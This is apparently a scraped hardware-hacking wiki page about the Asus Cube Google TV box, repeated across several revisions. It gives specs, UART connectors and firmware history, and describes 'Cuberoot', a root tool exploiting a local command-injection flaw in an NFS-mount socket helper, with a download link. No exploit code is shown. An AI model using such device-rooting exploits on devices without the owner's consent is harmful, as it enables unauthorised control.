*4 GB Flash NAND
*Two USB Ports
*IR Blaster

== Cuberoot ==
[[File:Cuberoot.png|200px|left|thumb]]
Cuberoot was released May 17, 2013 for the Asus Cube by the GTVHacker team. This root leverages a local command execution vulnerability within a Unix socket for NFS mounting. This socket interfaces with a helper application that doesn’t properly sanitize input allowing local code execution.

This particular vulnerability is made better by being able to be exploited from within an Android app, and allows us to provide users with an easy method of patching their device to prevent another application from exploiting the bug for nefarious reasons.

Cuberoot will:
*Root your Asus Cube.
*Install SuperSu.
*Modify the Flash Player to bypass website blocks on streaming media sites.
*Disable automatic updates.
*Collect anonymous statistical information about your device.
*Allow you to patch this vulnerability, which prevents malicious applications from using this bug.

Download [http://blog.gtvhacker.com/2013/rooting-your-asus-cube-with-cuberoot/download.gtvhacker.com/file/asus/Cuberoot.apk | Here]

== Gallery ==
<gallery>
File:Asus_cube_teardown1.jpg
File:Asus_cube_teardown2.jpg
File:Asus_cube_teardown3.jpg
File:Asus_cube_teardown4.jpg
File:Asus_cube_teardown5.jpg
File:Asus_cube_teardown6.jpg
File:Asus_cube_teardown7.jpg
File:Asus_cube_teardown8.jpg
File:Asus_cube_teardown9.jpg
File:Asus_cube_teardown10.jpg
File:Asus_cube_teardown11.jpg
File:Asus_cube_teardown12.jpg
File:Asus_cube_teardown13.jpg
File:Asus_cube_teardown14.jpg
File:Asus_cube_teardown15.jpg
File:Asus_cube_teardown16.jpg
File:Asus_cube_teardown17.jpg
File:Asus_cube_teardown18.jpg
File:Asus_cube_teardown19.jpg
File:Asus_cube_teardown20.jpg
</gallery>

== Update History ==
*MASTER.20130115.133219 (01/15/2013) - Launch version, shipped on the box. Box is branded as the "Asus Qube"
*MASTER.20130327.094230 - First OTA (04/24/2013). Rebrands the box as "Cube", adds Voice Search and additional apps [http://android.clients.google.com/packages/ota/asus_buddybox/145f690316be.asus_google_cube-ota-20130327.110723.zip Download]

== Connections / Connectors / Switches ==
*J2 - SPI ?
*UART1 - UART (115200 8n1)
*UART2
*RF_CON - Remote Control Antenna Board
*WIFI_CON - WiFi / BT Antenna Board (SDIO)
*SW1 - Factory Reset

File:Cuberoot.png

2013-05-17T06:52:05Z

CJ:

Asus Cube

2013-05-17T06:49:33Z

CJ: /* Cuberoot */

__FORCETOC__
{{Disclaimer}}
[[File:Asus_cube.jpg|200px|left|thumb]]
[[Category:Asus]]
This page will be dedicated to the hardware specifications, descriptions, and information related to the Asus Cube (Formerly Qube).

== Purchase ==
Buying Google TV devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next Google TV.

[http://www.amazon.com/gp/product/B00CBYYKKY/ref=as_li_ss_tl?ie=UTF8&tag=gtvcom-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=B00AM0ESC4 Purchase the Asus Cube at Amazon]

== Specs ==
These specifications are unverified, but based off of the SOC this should hold to be "trueish".
We will update this once the hardware ships.
*Marvell Armada 1500(88DE3100) 1.2 GHz dual-core processor, with a 750 MHz GPU
*1 GB DDR3 Memory
*4 GB Flash NAND
*Two USB Ports
*IR Blaster

== Cuberoot ==
Cuberoot was released May 17, 2013 for the Asus Cube by the GTVHacker team. This root leverages a local command execution vulnerability within a Unix socket for NFS mounting. This socket interfaces with a helper application that doesn’t properly sanitize input allowing local code execution.

This particular vulnerability is made better by being able to be exploited from within an Android app, and allows us to provide users with an easy method of patching their device to prevent another application from exploiting the bug for nefarious reasons.

Cuberoot will:
*Root your Asus Cube.
*Install SuperSu.
*Modify the Flash Player to bypass website blocks on streaming media sites.
*Disable automatic updates.
*Collect anonymous statistical information about your device.
*Allow you to patch this vulnerability, which prevents malicious applications from using this bug.

Download [http://blog.gtvhacker.com/2013/rooting-your-asus-cube-with-cuberoot/download.gtvhacker.com/file/asus/Cuberoot.apk | Here]

== Gallery ==
<gallery>
File:Asus_cube_teardown1.jpg
File:Asus_cube_teardown2.jpg
File:Asus_cube_teardown3.jpg
File:Asus_cube_teardown4.jpg
File:Asus_cube_teardown5.jpg
File:Asus_cube_teardown6.jpg
File:Asus_cube_teardown7.jpg
File:Asus_cube_teardown8.jpg
File:Asus_cube_teardown9.jpg
File:Asus_cube_teardown10.jpg
File:Asus_cube_teardown11.jpg
File:Asus_cube_teardown12.jpg
File:Asus_cube_teardown13.jpg
File:Asus_cube_teardown14.jpg
File:Asus_cube_teardown15.jpg
File:Asus_cube_teardown16.jpg
File:Asus_cube_teardown17.jpg
File:Asus_cube_teardown18.jpg
File:Asus_cube_teardown19.jpg
File:Asus_cube_teardown20.jpg
</gallery>

== Update History ==
*MASTER.20130115.133219 (01/15/2013) - Launch version, shipped on the box. Box is branded as the "Asus Qube"
*MASTER.20130327.094230 - First OTA (04/24/2013). Rebrands the box as "Cube", adds Voice Search and additional apps [http://android.clients.google.com/packages/ota/asus_buddybox/145f690316be.asus_google_cube-ota-20130327.110723.zip Download]

== Connections / Connectors / Switches ==
*J2 - SPI ?
*UART1 - UART (115200 8n1)
*UART2
*RF_CON - Remote Control Antenna Board
*WIFI_CON - WiFi / BT Antenna Board (SDIO)
*SW1 - Factory Reset

Asus Cube

2013-05-17T06:46:45Z

CJ:

__FORCETOC__
{{Disclaimer}}
[[File:Asus_cube.jpg|200px|left|thumb]]
[[Category:Asus]]
This page will be dedicated to the hardware specifications, descriptions, and information related to the Asus Cube (Formerly Qube).

== Purchase ==
Buying Google TV devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next Google TV.

[http://www.amazon.com/gp/product/B00CBYYKKY/ref=as_li_ss_tl?ie=UTF8&tag=gtvcom-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=B00AM0ESC4 Purchase the Asus Cube at Amazon]

== Specs ==
These specifications are unverified, but based off of the SOC this should hold to be "trueish".
We will update this once the hardware ships.
*Marvell Armada 1500(88DE3100) 1.2 GHz dual-core processor, with a 750 MHz GPU
*1 GB DDR3 Memory
*4 GB Flash NAND
*Two USB Ports
*IR Blaster

== Cuberoot ==
Cuberoot was released May 17, 2013 for the Asus Cube by the GTVHacker team. This root leverages a local command execution vulnerability within a Unix socket for NFS mounting. This socket interfaces with a helper application that doesn’t properly sanitize input allowing local code execution.

This particular vulnerability is made better by being able to be exploited from within an Android app, and allows us to provide users with an easy method of patching their device to prevent another application from exploiting the bug for nefarious reasons.

Cuberoot will:
*Root your Asus Cube.
*Install SuperSu.
*Modify the Flash Player to bypass website blocks on streaming media sites.
*Disable automatic updates.
*Collect anonymous statistical information about your device.
*Allow you to patch this vulnerability, which prevents malicious applications from using this bug.

Download Here

== Gallery ==
<gallery>
File:Asus_cube_teardown1.jpg
File:Asus_cube_teardown2.jpg
File:Asus_cube_teardown3.jpg
File:Asus_cube_teardown4.jpg
File:Asus_cube_teardown5.jpg
File:Asus_cube_teardown6.jpg
File:Asus_cube_teardown7.jpg
File:Asus_cube_teardown8.jpg
File:Asus_cube_teardown9.jpg
File:Asus_cube_teardown10.jpg
File:Asus_cube_teardown11.jpg
File:Asus_cube_teardown12.jpg
File:Asus_cube_teardown13.jpg
File:Asus_cube_teardown14.jpg
File:Asus_cube_teardown15.jpg
File:Asus_cube_teardown16.jpg
File:Asus_cube_teardown17.jpg
File:Asus_cube_teardown18.jpg
File:Asus_cube_teardown19.jpg
File:Asus_cube_teardown20.jpg
</gallery>

== Update History ==
*MASTER.20130115.133219 (01/15/2013) - Launch version, shipped on the box. Box is branded as the "Asus Qube"
*MASTER.20130327.094230 - First OTA (04/24/2013). Rebrands the box as "Cube", adds Voice Search and additional apps [http://android.clients.google.com/packages/ota/asus_buddybox/145f690316be.asus_google_cube-ota-20130327.110723.zip Download]

== Connections / Connectors / Switches ==
*J2 - SPI ?
*UART1 - UART (115200 8n1)
*UART2
*RF_CON - Remote Control Antenna Board
*WIFI_CON - WiFi / BT Antenna Board (SDIO)
*SW1 - Factory Reset

Asus Cube

2013-04-25T05:13:17Z

CJ: /* Specs */

Asus Cube

2013-04-25T03:54:35Z

CJ: /* Update History */

Asus Cube

2013-04-25T03:54:14Z

CJ: /* Update History */

Asus Cube

2013-04-25T03:49:12Z

CJ: /* Connections / Connectors / Switches */

Exploitee.rs - User contributions [en]

Tenvis T8810

Lutron L-BDG2-WH Caseta Smart Bridge​​

MUZO Cobblestone

MUZO Cobblestone

GGMM E3 Smart Speaker

VeraEdge Smart Home

Zmodo Greet

Amazon Tap

Amazon Tap

Amazon Tap

LG BP530​​

Sony BDP-S5100

LG Smart Refrigerator (LFX31995ST)​

Netgear Push2TV (PTV3000)​​

Amazon FireTV

Epson Artisan 700/800

Netgear NTV200-100NAS​

Belkin Wemo​

Staples Connect Hub​​

Hisense Android TV

Vizio Smart TV (VF553XVT)​

Exploiting Nest Thermostats

Exploiting Nest Thermostats

Exploiting Nest Thermostats

Exploiting Nest Thermostats

File:NestRoot.png

Nest

File:Nest.jpg

Nest

Asus Cube

Roku

Installing Custom Recovery (Gen 2 Only)

Installing Custom Recovery (Gen 2 Only)

Installing Custom Recovery (Gen 2 Only)

Installing Custom Recovery (Gen 2 Only)

Installing Custom Recovery (Gen 2 Only)

Installing Custom Recovery (Gen 2 Only)

Installing Custom Recovery (Gen 2 Only)

Installing Custom Recovery (Gen 2 Only)

Sony NSZ-GS7 (Streamer)

Asus Cube

Asus Cube

Asus Cube

File:Cuberoot.png

Asus Cube

Asus Cube

Asus Cube

Asus Cube

Asus Cube

Asus Cube

Lutron L-BDG2-WH Caseta Smart Bridge

LG BP530

LG Smart Refrigerator (LFX31995ST)

Netgear Push2TV (PTV3000)

Netgear NTV200-100NAS

Belkin Wemo

Staples Connect Hub

Vizio Smart TV (VF553XVT)